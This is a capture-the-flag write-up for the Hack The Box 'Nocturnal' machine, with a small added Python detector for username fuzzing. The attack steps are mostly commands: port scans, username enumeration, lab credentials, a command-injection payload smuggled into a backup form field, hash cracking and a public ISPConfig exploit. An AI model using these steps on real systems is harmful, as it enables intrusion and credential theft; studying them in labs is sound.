Nocturnal

HTB Linux

nmap -A -p- -oA nocturnal 10.129.153.236 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA nocturnal 10.129.153.236

echo "10.129.153.236 nocturnal.htb admin.nocturnal.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA nocturnal-udp 10.129.153.236

ping -c 1 10.129.153.236

nmap -p- --open -T5 -v -n 10.129.153.236

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.153.236 -oG allPorts

extractPorts allPorts

nmap -sCV -p22,80 10.129.153.236 -oN targeted

bc targeted -l rb

whatweb http://10.129.153.236

We browse to http://nocturnal.htb

Now we register an account

Now we see that we can upload files

A file is created on the server

ffuf -u 'http://nocturnal.htb/view.php?username=FUZZ&file=cu3rv0x.pdf' -w /usr/share/Seclists/Usernames/xato-net-10-million-usernames.txt -H 'Cookie: PHPSESSID=qme7rh97bcn67gitk7ne46jalt' -fs 2985
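
A defender's view of the username fuzzing step above, as an added example that is not part of the original write-up: it flags clients that request view.php with many distinct `username` values. The combined access-log format, the threshold and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumption: the web server writes the common "combined" access-log format.
# The page does not show the server's logs.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_username_enumeration(lines, path="/view.php", threshold=5):
    """Return {client_ip: sorted usernames} for clients that requested
    `path` with at least `threshold` distinct username values."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        url = urlsplit(m.group("target"))
        if url.path != path:
            continue
        for name in parse_qs(url.query).get("username", []):
            seen[m.group("ip")].add(name)
    return {ip: sorted(n) for ip, n in seen.items() if len(n) >= threshold}

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    f'203.0.113.7 - - [01/Jan/2025:10:00:0{i} +0000] '
    f'"GET /view.php?username={u}&file=cu3rv0x.pdf HTTP/1.1" 200 2985 "-" "Fuzz"'
    for i, u in enumerate(["admin", "root", "test", "guest", "info", "amanda"])
] + [
    '198.51.100.4 - - [01/Jan/2025:10:01:00 +0000] '
    '"GET /view.php?username=alice&file=report.pdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jan/2025:10:01:05 +0000] '
    '"GET /dashboard.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, names in find_username_enumeration(SAMPLE).items():
        print(f"{ip}: {len(names)} distinct usernames: {', '.join(names)}")
```

A legitimate user normally requests files under a single username, so even a low threshold separates normal use from a wordlist run.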

Looking through amanda's files, we see privacy.odt

libreoffice privacy.odt

Credentials -> amanda:arHkG7HAI68X8s1J

We click Go to Admin Panel

We enter the password again to create the backup

A backup of the files is generated.

We send a POST request to the form

c%09"sqlite3%09/var/www/nocturnal_database/nocturnal_database.db%09.dump"%0A
&backup=

We grab tobias's hash.

hashcat -m 0 hash /usr/share/wordlists/rockyou.txt

Credentials tobias:slowmotionapocalypse

ssh tobias@nocturnal.htb

cat user.txt

We see that port 8080 is listening.

netstat -ano

ssh tobias@nocturnal.htb -L 4444:127.0.0.1:8080

I tried to find the ISPConfig version

I searched searchsploit, but it had nothing for version 3.2

https://github.com/blindma1den/CVE-2023-46818-Exploit

python test2.py http://127.0.0.1:4444 admin slowmotionapocalypse

© 2025 Cu3rv0x